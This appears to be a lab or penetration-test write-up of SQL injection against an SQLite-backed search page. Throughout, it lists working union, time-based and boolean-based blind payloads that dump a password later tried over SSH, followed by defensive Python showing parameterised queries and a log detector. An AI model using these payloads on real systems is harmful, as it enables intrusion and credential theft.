SQLi


SQL injection vulnerability has been identified in the search function of the target web application.

Union-based In-band


The column count is 4. All 4 columns are reflected.

' UNION SELECT 1,sqlite_version(),sqlite_source_id(),4 FROM sqlite_master -- -

The backend database is SQLite. This was identified only after trial and error, having initially assumed the backend DB was either MySQL or MSSQL.

As the name suggests, SQLite is a lightweight relational database with a limited set of built-in functions.

Database Structure (Databases) (Union-based In-band)


' UNION SELECT 1,name,3,4 FROM pragma_database_list -- //

In SQLite, the concept of “databases” works differently than in MySQL or PostgreSQL. By default, SQLite operates with a single database (usually referred to as main), but it can also have attached databases (like secondary .db files).


' UNION SELECT 1,sql,3,4 FROM sqlite_master -- -

Database Structure (Tables)

' UNION SELECT 1,tbl_name,3,4 FROM sqlite_master WHERE type='table' -- -

Tables

The employees and emps tables notably stand out.

employees Table (Union-based In-band)


' UNION SELECT 1,name,3,4 FROM PRAGMA_TABLE_INFO('employees') -- -

A total of 4 columns exist within the employees table:

  • id
  • first_name
  • last_name
  • password

employees Table Dump (Union-based In-band)

' UNION SELECT id,first_name,last_name,password FROM employees -- -
' UNION SELECT * FROM employees -- -

There is a single entry in the employees table: the user Jeff Hills with the password Mathsisfun123. Validating the credential against the target SSH server.
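The search function modelled in Python as an added example (not the target application's code): the concatenated query that the union payload above exploits, beside the parameterised form that defeats it. The table names and the employees row come from this write-up; the emps rows, the query shape and the function names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the target's backend (not the target's
# data, apart from the one employees row this write-up recovered). Table
# shapes follow the write-up: emps trimmed to 4 of its 10 columns, employees
# with id/first_name/last_name/password.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE emps (id INTEGER, first_name TEXT, last_name TEXT, city TEXT);
        CREATE TABLE employees (id INTEGER, first_name TEXT, last_name TEXT, password TEXT);
        INSERT INTO emps VALUES (1, 'Alice', 'Example', 'Leeds'), (2, 'Bob', 'Sample', 'York');
        INSERT INTO employees VALUES (1, 'Jeff', 'Hills', 'Mathsisfun123');
    """)
    return conn

# Assumed shape of the vulnerable search: the term is pasted into the SQL text,
# so a quote closes the LIKE literal and the remainder is parsed as SQL.
def search_vulnerable(conn, term):
    sql = ("SELECT id, first_name, last_name, city FROM emps "
           f"WHERE first_name LIKE '%{term}%'")
    return conn.execute(sql).fetchall()

# Hardened form: a bound parameter is always a string value, never SQL, so the
# same payload is just a search term that matches nothing.
def search_safe(conn, term):
    sql = "SELECT id, first_name, last_name, city FROM emps WHERE first_name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()

# The union payload from the employees table dump above (4 columns, like emps).
UNION_PAYLOAD = "' UNION SELECT id,first_name,last_name,password FROM employees -- -"

def leaks_password(rows):
    # True if any returned row carries the employees.password value.
    return any(row[3] == "Mathsisfun123" for row in rows)

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, UNION_PAYLOAD))  # includes (1, 'Jeff', 'Hills', 'Mathsisfun123')
    print(search_safe(db, UNION_PAYLOAD))        # []
    print(search_safe(db, "Ali"))                # [(1, 'Alice', 'Example', 'Leeds')]
```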

emps Table (Union-based In-band)


' UNION SELECT 1,GROUP_CONCAT(name),3,4 FROM PRAGMA_TABLE_INFO('emps') -- -

A total of 10 columns exist within the emps table:

  • id
  • first_name
  • last_name
  • birth_date
  • address
  • postcode
  • city
  • state
  • country
  • hidden

These are the same employees shown on the index.php page.

File Read (Union-based In-band)


File read is only possible if load_extension() or readfile() is enabled.

' UNION SELECT 1,sqlite3_load_extension('C:\Windows\win.ini'),3,4 -- //

' UNION SELECT 1,load_extension('C:\Windows\win.ini'),3,4 -- //

' UNION SELECT 1,readfile('C:\Windows\win.ini'),3,4 -- //

None of them are enabled. File read is not possible.

File Write (Union-based In-band)


writefile() must be enabled.

SELECT writefile('<FILE_NAME>',<CONTENT>);

The webroot directory has not been identified, so the write operation cannot be verified.

Error-based In-band


Given that the SQL error is not visible, error-based SQLi is not possible.

Time-based Blind


A true condition makes the page hang for a few seconds.

' AND (SELECT CASE WHEN sqlite_version() LIKE '3%' THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN sqlite_version()='3.28.0' THEN RANDOMBLOB(1e8) END) -- -

SQLite version is 3.28.0.

' AND (SELECT 1 FROM pragma_database_list WHERE (LIKE('m%',name) AND RANDOMBLOB(100000000))) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM pragma_database_list WHERE name='main' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

There is a single database: main.

Tables (Time-based Blind)


' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE type='table' AND tbl_name LIKE 'e%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE tbl_name='emps' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

The emps table exists.

' AND (SELECT CASE WHEN (SELECT 1 FROM sqlite_master WHERE tbl_name='employees' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

The employees table exists.

employees Table (Time-based Blind)


' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'pass%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='password' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

employees.password column.

' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'first%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='first_name' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
 
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'last%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='last_name' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

first_name and last_name columns.

employees Table Dump (Time-based Blind)

' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name LIKE 'J%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

First name is Jeff.

' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name LIKE 'h%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name LIKE 'hills%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE last_name='Hills' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

SQLite's LIKE is case-insensitive for ASCII, so 'hills%' still matches; the = comparison is case-sensitive and confirms the last name is Hills.

' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password LIKE 'Ma%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password LIKE 'Mathsisfun1%' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -
' AND (SELECT CASE WHEN (SELECT 1 FROM employees WHERE first_name='Jeff' AND last_name='Hills' AND password='Mathsisfun123' LIMIT 1) THEN RANDOMBLOB(1e8) END) -- -

The password is Mathsisfun123. Validating the credential against the target SSH server.

Boolean-based Blind


  • The page loads normally when the condition is true.
  • A blank or error page is returned when the condition is false.

' AND (SELECT sqlite_version() LIKE '3%') -- -
' AND (SELECT sqlite_version()='3.28.0') -- -

SQLite version is 3.28.0.

' AND (SELECT name LIKE 'm%' FROM pragma_database_list) -- -
' AND (SELECT name='main' FROM pragma_database_list) -- -

The main database exists.

Tables (Boolean-based Blind)


' AND EXISTS (SELECT 1 FROM sqlite_master WHERE type='table' AND tbl_name LIKE 'e%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM sqlite_master WHERE tbl_name='employees' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM sqlite_master WHERE tbl_name='emps' LIMIT 1) -- -

employees and emps tables

employees Table (Boolean-based Blind)


' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'pass%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='password' LIMIT 1) -- -

employees.password column.

' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'first%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='first_name' LIMIT 1) -- -

employees.first_name column.

' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name LIKE 'last%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM PRAGMA_TABLE_INFO('employees') WHERE name='last_name' LIMIT 1) -- -

employees.last_name column.

employees Table Dump (Boolean-based Blind)

' AND EXISTS (SELECT 1 FROM employees WHERE first_name LIKE 'J%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE first_name='Jeff' LIMIT 1) -- -

First name is Jeff.

' AND EXISTS (SELECT 1 FROM employees WHERE last_name LIKE 'H%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE last_name='Hills' LIMIT 1) -- -

Last name is Hills.

' AND EXISTS (SELECT 1 FROM employees WHERE password LIKE 'M%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE password LIKE 'Mathsisf%' LIMIT 1) -- -
' AND EXISTS (SELECT 1 FROM employees WHERE password='Mathsisfun123' LIMIT 1) -- -

The password is Mathsisfun123. Validating the credential against the target SSH server.
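An added example, not part of the original notes: a small detector that runs over constructed web-server access-log lines and flags the payload families used throughout this write-up (union/schema enumeration, SQLite fingerprinting, file-access functions, RANDOMBLOB delays, comment tails). The log format, the search.php path and the q parameter are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Indicator families drawn from the payloads in this write-up: union/schema
# enumeration, SQLite fingerprinting, extension-based file access and the
# RANDOMBLOB delay primitive used for the time-based probes.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "schema_enum": re.compile(r"\b(sqlite_master|pragma_database_list|pragma_table_info)\b", re.I),
    "sqlite_fingerprint": re.compile(r"\bsqlite_(version|source_id)\s*\(", re.I),
    "file_access": re.compile(r"\b(load_extension|readfile|writefile)\s*\(", re.I),
    "time_delay": re.compile(r"\bRANDOMBLOB\s*\(", re.I),
    "comment_tail": re.compile(r"--\s*[-/]"),
}

# Common/combined log format (assumed); only the fields the scan needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Return the sorted indicator families matched by any query-string value
    of a request target (empty list when nothing matches)."""
    hits = set()
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote_plus(value)  # strip one extra encoding layer, if any
            hits.update(name for name, pat in INDICATORS.items() if pat.search(decoded))
    return sorted(hits)

def scan_log(lines):
    """Return a list of (ip, target, families) for every parsable line that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        families = classify_request(m["target"])
        if families:
            findings.append((m["ip"], m["target"], families))
    return findings

# Constructed access-log lines (not from the target; search.php and q are
# assumed): a benign search, a union/schema probe and a time-based probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?q=jeff HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?q=%27+UNION+SELECT+1%2Cname%2C3%2C4+FROM+sqlite_master+--+- HTTP/1.1" 200 610',
    '10.0.0.9 - - [01/Jan/2024:10:00:19 +0000] "GET /search.php?q=%27+AND+%28SELECT+CASE+WHEN+sqlite_version%28%29+LIKE+%273%25%27+THEN+RANDOMBLOB%281e8%29+END%29+--+- HTTP/1.1" 200 402',
]

if __name__ == "__main__":
    for ip, target, families in scan_log(SAMPLE_LOG):
        print(ip, families, target)
```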